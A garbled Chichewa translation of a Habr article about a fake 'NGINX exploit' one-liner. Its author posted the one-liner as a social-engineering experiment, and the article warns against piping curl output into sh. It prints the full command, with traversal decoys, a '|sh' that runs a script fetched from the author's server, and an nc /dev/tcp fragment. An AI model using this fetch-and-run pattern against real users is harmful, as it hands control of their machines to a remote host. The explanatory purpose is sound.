Zindikirani. transl.:
TL; DR: Osagwiritsa ntchito mapaipi amafayilo mu sh kapena bash mulimonse. Iyi ndi njira yabwino kulephera kulamulira kompyuta yanu.
Ndikufuna kugawana nanu nkhani yachidule yokhudza zamatsenga za PoC zomwe zidapangidwa pa Meyi 31st. Adawonekera mwachangu poyankha nkhani zochokera
Nditamaliza kugwiritsa ntchito njira yatsopano yolumikizira ma curl, ndidagwira mawu a tweet yoyambirira ndi "kutulutsa PoC" yomwe ili ndi mzere umodzi wa code womwe ukuganiza kuti umagwiritsa ntchito chiwopsezo chomwe chapezeka. Inde, izi zinali zopanda pake. Ndinkaganiza kuti ndiwululidwa nthawi yomweyo, ndikuti ndikapeza ma retweets angapo (o, chabwino).
Komabe, sindinathe kulingalira zimene zinachitika pambuyo pake. Kutchuka kwa ma tweet anga kudakwera kwambiri. Chodabwitsa n'chakuti panthawiyi (15:00 Moscow nthawi ya June 1) anthu ochepa azindikira kuti izi ndi zabodza. Anthu ambiri amabwerezanso osayang'ana konse (osasiyapo kusirira zithunzi zokongola za ASCII zomwe zimatulutsa).
Tangoonani kukongola kwake!
Ngakhale malupu ndi mitundu yonseyi ndi yabwino, zikuwonekeratu kuti anthu amayenera kuyendetsa makina pamakina awo kuti awone. Mwamwayi, asakatuli amagwira ntchito mofananamo, ndikuphatikizana ndi mfundo yakuti sindinkafuna kwenikweni kulowa m'mavuto azamalamulo, kachidindo kamene kakayikidwa pa tsamba langa anali kungoyimba ma echo popanda kuyesa kuyika kapena kuchita zina zowonjezera.
Kutuluka pang'ono:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Socio-electronic engineering (SEE) - zambiri osati phishing
Chitetezo ndi kudziwana zinali mbali yaikulu ya kuyesaku. Ndikuganiza kuti ndi zomwe zidapangitsa kuti apambane. Mzere wolamula umatanthauza chitetezo potchula "127.0.0.1" (wodziwika bwino wamba). Localhost imatengedwa kuti ndi yotetezeka ndipo zomwe zilimo sizichoka pakompyuta yanu.
Kudziwa bwino kunali gawo lachiwiri la ONANI chigawo cha kuyesa. Popeza omvera omwe amawatsata makamaka anali anthu omwe amadziwa zofunikira za chitetezo cha makompyuta, kunali kofunika kupanga kachidindo kuti mbali zake ziwoneke ngati zodziwika komanso zodziwika bwino (ndipo zimakhala zotetezeka). Kubwereka zinthu zamalingaliro akale amapezerapo mwayi ndikuphatikiza mwanjira yachilendo kwatsimikizira kukhala kopambana kwambiri.
Pansipa pali kusanthula kwatsatanetsatane kwa mzere umodzi. Zonse zomwe zili pamndandandawu zimavala zodzikongoletsera chikhalidwe, ndipo kwenikweni palibe chimene chimafunika pa ntchito yake yeniyeni.
Ndi zigawo ziti zomwe zili zofunikadi? Izi -gsS
, -O 0x0238f06a
, |sh
ndi seva yapaintaneti yokha. Seva yapaintaneti inalibe malangizo oyipa, koma idangopereka zithunzi za ASCII pogwiritsa ntchito malamulo echo
mu script yomwe ili mu index.html
. Pamene wosuta adalowa mzere ndi |sh
pakati, index.html
zodzaza ndi kuphedwa. Mwamwayi, oyang'anira seva yapaintaneti analibe zolinga zoyipa.
-
../../../%00
- imayimira kupyola chikwatu; -
ngx_stream_module.so
- njira yopita ku module ya NGINX mwachisawawa; -
/bin/sh%00<'protocol:TCP'
- timangoganiza zoyamba/bin/sh
pa makina omwe mukufuna ndikuwongolera zomwe zimatuluka ku njira ya TCP; -
-O 0x0238f06a#PLToffset
- chinsinsi chopangira, chowonjezera#PLToffset
, kuoneka ngati kukumbukira kukumbukira mwanjira ina yomwe ili mu PLT; -
|sh;
- chidutswa china chofunikira. Tidayenera kuwongolera zomwe zatuluka ku sh/bash kuti tipereke nambala yomwe imachokera ku seva yowukira yomwe ili pa.0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- dummy momwe netcat imatanthawuza/dev/tcp/localhost
kotero kuti zonse zikuwoneka zotetezeka kachiwiri. Ndipotu, sichichita kalikonse ndipo imaphatikizidwa pamzere wa kukongola.
Izi zimamaliza kumasulira kwa script ya mzere umodzi ndikukambirana za "socio-electronic engineering" (phishing yovuta).
Kusintha kwa Seva Yapaintaneti ndi Zoyeserera
Popeza ambiri mwa olembetsa anga ndi infosec / hackers, ndinaganiza zopanga seva yapaintaneti kuti ikhale yosagwirizana ndi mawu a "chidwi" kumbali yawo, kuti anyamatawo akhale ndi chochita (ndipo zingakhale zosangalatsa khazikitsa). Sindilemba misampha yonse pano popeza kuyesaku kukupitilirabe, koma nazi zinthu zingapo zomwe seva imachita:
- Imayang'anitsitsa zoyeserera zogawira pa malo ena ochezera a pa Intaneti ndikulowetsamo tizithunzi tating'ono tosiyanasiyana kuti tilimbikitse wogwiritsa ntchito kudina ulalo.
- Imawongolera Chrome/Mozilla/Safari/etc kuvidiyo yotsatsira ya Thugcrowd m'malo mowonetsa chipolopolo.
- Kuyang'ana zizindikiro zowoneka bwino za kulowerera / kubera mobisa, kenako ndikuyamba kulozera zopempha ku ma seva a NSA (ha!).
- Imayika Trojan, komanso BIOS rootkit, pamakompyuta onse omwe ogwiritsa ntchito amachezera omwe ali nawo kuchokera pa msakatuli wokhazikika (kungosewera!).
Gawo laling'ono la antimers
Pankhaniyi, cholinga changa chokha chinali kudziwa zina mwa Apache - makamaka, malamulo ozizira otsogolera zopempha - ndipo ndinaganiza: bwanji?
NGINX Exploit (Zowona!)
Lembetsani ku
Source: www.habr.com